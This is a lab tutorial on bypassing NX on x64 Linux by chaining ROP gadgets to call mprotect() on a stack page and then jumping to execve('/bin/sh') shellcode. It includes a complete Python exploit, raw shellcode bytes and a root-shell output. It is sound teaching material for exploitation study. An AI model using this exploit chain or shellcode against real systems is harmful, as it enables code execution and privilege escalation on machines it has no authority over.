Bypassing NX with mprotect ROP Chains

Use Return-Oriented Programming to call mprotect() and make stack memory executable, then jump to shellcode on x64 Linux.

Prerequisites

  • Understanding of x64 calling conventions
  • Familiarity with ROP concepts
  • Previous buffer overflow experience
  • Basic knowledge of virtual memory and page permissions

Part 10 of 13 in Linux Exploitation Fundamentals

When NX prevents executing shellcode on the stack, one approach is to ROP into system("/bin/sh"). But what if you want to run custom shellcode — for example, a staged payload or something that can’t be expressed as a library call? You can use a ROP chain to call mprotect(), change the stack’s page permissions to RWX, and then jump directly to your shellcode.

Note

Lab Binary: This tutorial uses the target binary from the Linux Exploitation Lab (06-mprotect-rop/). See the setup guide for build instructions.

Understanding mprotect

int mprotect(void *addr, size_t len, int prot);
  • addr — Start of the memory region (must be page-aligned)
  • len — Length in bytes
  • prot — Permission flags: PROT_READ (1) + PROT_WRITE (2) + PROT_EXEC (4) = 7

By calling mprotect(stack_page, 0x1000, 7), we make a page of stack memory readable, writable, and executable. Then we jump to shellcode sitting on that page.
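The alignment rule and the permission value are easy to check offline. The following is a minimal sketch: the helper name page_align and the sample address are illustrative assumptions, and the 4 KiB page size is the usual x64 Linux default rather than something read from the target.

```python
PAGE_SIZE = 0x1000  # assumed 4 KiB pages (the usual default on x64 Linux)

# Permission bits as defined for mprotect()
PROT_READ, PROT_WRITE, PROT_EXEC = 1, 2, 4


def page_align(addr, page_size=PAGE_SIZE):
    """Round addr down to the start of the page that contains it."""
    return addr & ~(page_size - 1)


prot = PROT_READ | PROT_WRITE | PROT_EXEC
sample = 0x7fffffffe3a0  # hypothetical stack address, for illustration only
print(hex(page_align(sample)), prot)
```

Any address inside a page maps to the same aligned start, so the address passed to mprotect() only needs to identify the page that holds the shellcode.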

Initial Analysis

Check Protections

checksec ./target
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE

Two protections to deal with: a custom integrity check (not a real GCC stack canary — see warning below) and NX. No PIE means binary addresses are fixed.

Warning

This is not a GCC stack canary. checksec says “Canary found” because the binary contains the symbol pattern it looks for, but the check the program actually implements is a hand-rolled integrity word at a fixed offset, with a constant value (\xff\xff\xff\xff). Real -fstack-protector canaries are random per process, placed between the local arrays and the saved frame data, and re-read in the epilogue with a jump to __stack_chk_fail on mismatch, so you cannot defeat them by guessing the value.

The technique below (read the canary in your debugger, then splice the same bytes back into the payload) only works because the value here is a fixed, known constant. Defeating a real GCC canary needs a leak primitive (format string, OOB read, side channel) or a separate bug in the same process. Do not generalise this lab to think GCC canaries are bypassable by pattern alone.

Decompile with Ghidra

void main(void)
{
    char local_118[264];
    int local_10;
    int local_c;

    gets(local_118);
    local_10 = thunk_FN_004010ce(local_118);
    printf("Printing the outcome: ");
    for (local_c = 0; local_c < local_10; local_c = local_c + 1) {
        printf("%02x", (ulong)(uint)(int)local_118[local_c]);
    }
    putchar(10);
    return 0;
}

The gets() call gives us an unbounded overflow. The buffer is 264 bytes.

Dealing with the Stack Canary

Identifying the Canary

Set a breakpoint after gets() and examine the stack:

gdb-peda$ b *main+70
gdb-peda$ run <<< $(python -c 'print("A"*264)')
gdb-peda$ x/80wx $rsp

Look at the value that sits between the buffer and the saved RBP. A real canary would change between runs; in this binary the value is identical on every run: 4 bytes of \xff at a fixed position, followed by 4 zero bytes:

0x7fffffffe3a0: 0x41414141 0x41414141 ... (buffer)
...
0x7fffffffe4a8: 0xffffffff 0x00000000 ... (canary region)
0x7fffffffe4b0: 0x7fffffffe4c0 ...       (saved RBP, buffer + 272)
0x7fffffffe4b8: ...                       (saved RIP, buffer + 280)

Preserving the Canary

Since the canary value is known and constant, include it at the correct offset in the payload so the overflow doesn’t trigger the canary check:

buf = b"A" * 264          # fill buffer
buf += b"\xff" * 4         # canary value
buf += b"\x00" * 4         # canary padding
buf += b"B" * 8            # saved RBP
# RIP overwrite follows...
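Before appending the chain, it can help to confirm the offsets. The sketch below assumes the frame layout implied by the decompilation (264-byte buffer, two 4-byte locals, saved RBP); the constant names are illustrative.

```python
BUF_SIZE = 264                 # size of local_118 in the decompilation
INTEGRITY_WORD = b"\xff" * 4   # constant value observed in the debugger

prefix = b"A" * BUF_SIZE + INTEGRITY_WORD + b"\x00" * 4 + b"B" * 8

# The integrity word must sit directly after the buffer.
assert prefix[BUF_SIZE:BUF_SIZE + 4] == INTEGRITY_WORD

rip_offset = len(prefix)       # the first ROP gadget goes at this offset
print(f"integrity word at offset {BUF_SIZE}, saved RIP at offset {rip_offset}")
```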

Finding ROP Gadgets

Use ropper to search the binary:

ropper -f ./target --search "pop rdi"
ropper -f ./target --search "pop rsi"
ropper -f ./target --search "pop rdx"
0x0000000000401766: pop rdi; ret;
0x000000000040770e: pop rsi; ret;
0x0000000000444bb5: pop rdx; ret;

We also need the address of mprotect. Since the binary is statically linked (no libc dependency), mprotect is available as a syscall stub:

gdb-peda$ p mprotect
0x468c84

Or use the syscall instruction directly:

ropper -f ./target --search "syscall"
0x0000000000468c84: syscall; ret;

The syscall number for mprotect on x64 is 10 (0xa).

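Setting RAX to the Syscall Number

We need RAX = 10 for the mprotect syscall. Loading it with a pop rax; ret gadget would put the byte 0x0a (a newline) into the payload, and gets() stops reading at a newline, so a direct pop is only an option when the input path tolerates that byte. Otherwise, build the value from gadgets that need no immediate data: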

ropper -f ./target --search "pop rax"
# or construct it:
ropper -f ./target --search "xor rax"
0x000000000043a8a5: xor rax, rax; ret;      # zero rax
0x00000000004637b1: add eax, 3; ret;         # add 3 (used twice)
0x0000000000463798: add eax, 2; ret;         # add 2

To get RAX = 10: xor rax, rax (0) -> add eax, 3 (3) -> add eax, 3 (6) -> add eax, 2 (8) -> add eax, 2 (10).
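The same arithmetic can be automated for other syscall numbers. This is a sketch only: the gadget addresses are the lab binary's values from the ropper output, and the helper names increments_for and rax_chain are hypothetical.

```python
from struct import pack

# Gadget addresses from the ropper output (specific to the lab binary).
XOR_RAX = 0x43a8a5                      # xor rax, rax; ret
ADD_GADGETS = {3: 0x4637b1, 2: 0x463798}  # add eax, N; ret


def increments_for(target):
    """Return a list of 3s and 2s that sums to target, preferring 3s."""
    for threes in range(target // 3, -1, -1):
        rest = target - 3 * threes
        if rest % 2 == 0:
            return [3] * threes + [2] * (rest // 2)
    raise ValueError(f"cannot reach {target} with +3/+2 steps")


def rax_chain(target):
    """Pack the gadget sequence that leaves `target` in RAX."""
    chain = pack("<Q", XOR_RAX)
    for step in increments_for(target):
        chain += pack("<Q", ADD_GADGETS[step])
    return chain


steps = increments_for(10)
chain = rax_chain(10)
print(steps, len(chain))
```

For a target of 10 this produces the sequence used in this tutorial: two add eax, 3 gadgets followed by two add eax, 2 gadgets.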

Choosing the Target Memory Region

Use vmmap in GDB to find a writable region that already holds our shellcode (the stack):

gdb-peda$ vmmap
Start              End                Perm  Name
...
0x00007fffffffe000 0x00007fffffffffff rw-p  [stack]

The stack mapping starts at 0x7fffffffe000. This address is page-aligned, and the region is currently rw- (not executable). The buffer at 0x7fffffffe3a0 lies inside this first page, so we’ll call mprotect(0x7fffffffe000, 0x1000, 7) to add execute permission to it.

Using the stack has an advantage: our payload data is already there, so we don’t need to copy the shellcode anywhere.

Building the ROP Chain

The Chain

1. xor rax, rax; ret          -- Zero RAX
2. add eax, 3; ret            -- RAX = 3
3. add eax, 3; ret            -- RAX = 6
4. add eax, 2; ret            -- RAX = 8
5. add eax, 2; ret            -- RAX = 10 (mprotect syscall)
6. pop rdi; ret               -- Load address into RDI
7. 0x7fffffffe000             -- Page-aligned stack address
8. pop rsi; ret               -- Load length into RSI
9. 0x1000                     -- One page (4096 bytes)
10. pop rdx; ret              -- Load permissions into RDX
11. 0x7                       -- PROT_READ | PROT_WRITE | PROT_EXEC
12. syscall; ret              -- mprotect(0x7fffffffe000, 0x1000, 7)
13. pop rdi; ret              -- Pop the next value into RDI, then return
14. <shellcode address>       -- Popped into RDI (address on the now-executable stack)
15. <shellcode address>       -- Consumed by ret: execution continues in the shellcode

Stack Layout: mprotect ROP Chain

Low addr
  +-----------------------------+
  |  "A" * 264  (buffer fill)   |
  +-----------------------------+
  |  0xffffffff  (canary)       |
  |  0x00000000  (canary pad)   |
  +-----------------------------+
  |  "B" * 8     (saved RBP)    |
  +=============================+ <- RIP
  |  xor rax, rax; ret         | rax = 0
  +-----------------------------+
  |  add eax, 3; ret           | rax = 3
  +-----------------------------+
  |  add eax, 3; ret           | rax = 6
  +-----------------------------+
  |  add eax, 2; ret           | rax = 8
  +-----------------------------+
  |  add eax, 2; ret           | rax = 10
  +-----------------------------+
  |  pop rdi; ret              |
  +-----------------------------+
  |  0x7fffffffe000  (addr)    | -> RDI
  +-----------------------------+
  |  pop rsi; ret              |
  +-----------------------------+
  |  0x1000  (page size)       | -> RSI
  +-----------------------------+
  |  pop rdx; ret              |
  +-----------------------------+
  |  0x7  (RWX)                | -> RDX
  +-----------------------------+
  |  syscall; ret              | mprotect()
  +=============================+
  |  pop rdi; ret              |
  +-----------------------------+
  |  shellcode_addr            | -> RDI
  +-----------------------------+
  |  shellcode_addr            | ret to
  +-----------------------------+  shellcode
  |  NOP sled + shellcode      |
  +-----------------------------+
High addr

The Shellcode

A standard execve("/bin/sh") for x64:

; execve("/bin/sh", ["/bin/sh", NULL], NULL)
    xor rdx, rdx                      ; envp = NULL
    movabs rbx, 0x68732f6e69622fff    ; "/bin/sh" with a 0xff filler in the low byte
    shr rbx, 0x8                      ; drop the filler; the top byte becomes the NUL terminator
    push rbx                          ; "/bin/sh\0" is now on the stack
    mov rdi, rsp                      ; rdi = pointer to the string
    xor rax, rax                      ; rax = 0
    push rax                          ; argv[1] = NULL
    push rdi                          ; argv[0] = pointer to "/bin/sh"
    mov rsi, rsp                      ; rsi = argv
    mov al, 0x3b                      ; syscall 59 = execve
    syscall
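The shift trick for building the string can be checked without assembling anything. The sketch below assumes a constant whose lowest byte is a filler (0xff here): shifting right by 8 drops the filler and leaves a zero top byte that terminates the string. The helper name is illustrative.

```python
from struct import pack


def string_after_shift(imm64):
    """Bytes that `push rbx` stores after `shr rbx, 8` on the given constant."""
    return pack("<Q", imm64 >> 8)


with_filler = 0x68732f6e69622fff   # assumed variant: 0xff filler in the low byte
print(string_after_shift(with_filler))
```

If the constant has no filler byte, the shift removes the leading "/" instead, so it is worth running this check on whatever constant the shellcode actually uses.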

Complete Exploit

#!/usr/bin/env python3
from struct import pack

# Gadget addresses (no PIE, so these are fixed)
# NOTE: The ROP chain addresses shown here are specific to the lab binary.
# When adapting this technique, use ropper or ROPgadget to find equivalent
# gadgets in your target binary, and update all addresses accordingly.
xor_rax      = 0x43a8a5    # xor rax, rax; ret
add_eax_3    = 0x4637b1    # add eax, 3; ret
add_eax_2    = 0x463798    # add eax, 2; ret
pop_rdi      = 0x401766    # pop rdi; ret
pop_rsi      = 0x40770e    # pop rsi; ret
pop_rdx      = 0x444bb5    # pop rdx; ret
syscall_ret  = 0x468c84    # syscall; ret

# Target: make stack page executable
stack_page   = 0x7fffffffe000
page_size    = 0x1000
rwx          = 0x7

# Shellcode: execve("/bin/sh", ["/bin/sh", NULL], NULL)
shellcode = (
    b"\x48\x31\xd2"                                # xor rdx, rdx        (envp = NULL)
    b"\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68"    # movabs rbx, 0x68732f6e69622fff
    b"\x48\xc1\xeb\x08"                            # shr rbx, 8          (drop filler byte)
    b"\x53"                                        # push rbx            ("/bin/sh\0")
    b"\x48\x89\xe7"                                # mov rdi, rsp        (path)
    b"\x48\x31\xc0"                                # xor rax, rax
    b"\x50"                                        # push rax            (argv[1] = NULL)
    b"\x57"                                        # push rdi            (argv[0] = path)
    b"\x48\x89\xe6"                                # mov rsi, rsp        (argv)
    b"\xb0\x3b"                                    # mov al, 0x3b        (execve)
    b"\x0f\x05"                                    # syscall
)

# Build buffer
buf = b"A" * 264                           # fill buffer
buf += b"\xff" * 4                          # stack canary
buf += b"\x00" * 4                          # canary padding
buf += b"B" * 8                             # saved RBP

# ROP chain: mprotect(stack_page, 0x1000, 7)
buf += pack("<Q", xor_rax)                  # rax = 0
buf += pack("<Q", add_eax_3)                # rax = 3
buf += pack("<Q", add_eax_3)                # rax = 6
buf += pack("<Q", add_eax_2)                # rax = 8
buf += pack("<Q", add_eax_2)                # rax = 10 (mprotect)
buf += pack("<Q", pop_rdi)
buf += pack("<Q", stack_page)               # addr = 0x7fffffffe000
buf += pack("<Q", pop_rsi)
buf += pack("<Q", page_size)                # len = 0x1000
buf += pack("<Q", pop_rdx)
buf += pack("<Q", rwx)                      # prot = RWX
buf += pack("<Q", syscall_ret)              # mprotect()

# After mprotect, return into the shellcode on the now-executable stack.
# The NOP sled and shellcode are placed right after the ROP chain, so their
# address is the buffer address plus everything written before them.
# buf_addr is the start of the buffer as seen in the GDB session; confirm it
# with a breakpoint after the gets() call (x/40gx $rsp) and adjust as needed.
buf_addr = 0x7fffffffe3a0
shellcode_addr = buf_addr + len(buf) + 3 * 8   # skip the three qwords below
buf += pack("<Q", pop_rdi)
buf += pack("<Q", shellcode_addr)           # popped into RDI (not used by the shellcode)
buf += pack("<Q", shellcode_addr)           # ret transfers control to the NOP sled

# Pad to align shellcode at the expected address
buf += b"\x90" * 32                         # NOP sled
buf += shellcode

# Write the payload; the context manager closes and flushes the file
with open("payload.txt", "wb") as f:
    f.write(buf)
print("[+] Payload written to payload.txt")
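Because the payload is delivered through gets(), which stops reading at the first newline, a 0x0a byte anywhere in the payload truncates it. A small check along these lines can catch that before testing; the helper name bad_offsets is hypothetical, and the gadget addresses are the lab binary's.

```python
from struct import pack

BAD_BYTES = b"\n"   # gets() stops at a newline


def bad_offsets(payload, bad=BAD_BYTES):
    """Return the offsets of any bytes that would truncate the input."""
    return [i for i, byte in enumerate(payload) if byte in bad]


# Placing the syscall number 10 on the stack directly would embed a newline...
direct = pack("<Q", 10)
# ...while the xor/add gadget addresses from the lab binary contain none.
built = b"".join(pack("<Q", a) for a in (0x43a8a5, 0x4637b1, 0x463798))

print(bad_offsets(direct), bad_offsets(built))
```

Running bad_offsets(buf) on the finished payload before writing it to disk gives the same check for the whole exploit.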

Execution

(cat payload.txt; cat) | ./target
Printing the outcome: 41414141...
id
uid=0(root) gid=0(root) groups=0(root)

Debugging: Segfault Outside GDB

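A common issue: the exploit works inside GDB but segfaults when run directly. GDB shifts stack addresses slightly (it changes the environment variables and the argv layout), and it also disables ASLR for the debugged process by default. The fixed stack addresses in this tutorial therefore assume that ASLR is disabled on the lab machine as well.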

Using Core Dumps

ulimit -c unlimited
python3 exploit.py; cat payload.txt | ./target

If it crashes, examine the core dump:

gdb -q ./target ./core
gdb-peda$ x/10gx $rsp

Find where your shellcode actually landed and adjust shellcode_addr accordingly. The offset between GDB and bare execution is typically small (a few hundred bytes).
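Once the core dump shows where the buffer really starts, the landing address follows from the payload layout. This is a rough sketch assuming the layout used in this tutorial (280 bytes before the saved RIP, then 15 qwords of chain); the function names and the sample buffer address are illustrative and should be replaced with observed values.

```python
BUF_TO_RIP = 264 + 4 + 4 + 8   # buffer, integrity word, padding, saved RBP
CHAIN_QWORDS = 15              # 12 qwords for mprotect + 3 for the final jump
PAGE = 0x1000


def sled_start(buf_addr):
    """Address of the first NOP, given where the buffer starts in memory."""
    return buf_addr + BUF_TO_RIP + CHAIN_QWORDS * 8


def in_region(addr, region_start, length=PAGE):
    """True if addr falls inside the region passed to mprotect()."""
    return region_start <= addr < region_start + length


observed_buf = 0x7fffffffe3a0   # example value; use the address from your core dump
addr = sled_start(observed_buf)
print(hex(addr), in_region(addr, 0x7fffffffe000))
```

If in_region returns False for the observed address, the mprotect() target page has to move along with shellcode_addr.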

Alternative: Use a NOP Sled

A generous NOP sled (\x90 * N) before the shellcode makes the exact address less critical. As long as you jump anywhere into the sled, execution slides into the shellcode.

mprotect vs. Other NX Bypass Strategies

Approach            Pros                                Cons
ROP to system()     Simple chain, no shellcode needed   Limited to library calls
ROP to mprotect()   Run arbitrary shellcode             Longer chain, need precise addresses
ROP to mmap()       Allocate fresh RWX memory           Need to copy shellcode there
ret2libc            Well-documented                     ASLR complicates libc addresses

The mprotect approach is most useful when:

  • You need custom shellcode (staged payloads, encoders, etc.)
  • The binary is statically linked (gadgets are plentiful, no libc ASLR concern)
  • You already control stack contents and just need to make them executable

Key Takeaways

  1. mprotect changes page permissions at runtime: call it via ROP to make the stack executable, then jump to your shellcode
  2. The address must be page-aligned: round down to the nearest 0x1000 boundary
  3. Hand-rolled integrity values can be constant: this lab's check uses a fixed value that can be included in the payload verbatim, which is not possible with a real GCC canary
  4. Build RAX incrementally: if you can’t find or can't use pop rax; ret, chain xor and add gadgets to construct the syscall number
  5. GDB shifts the stack: always verify addresses outside the debugger using core dumps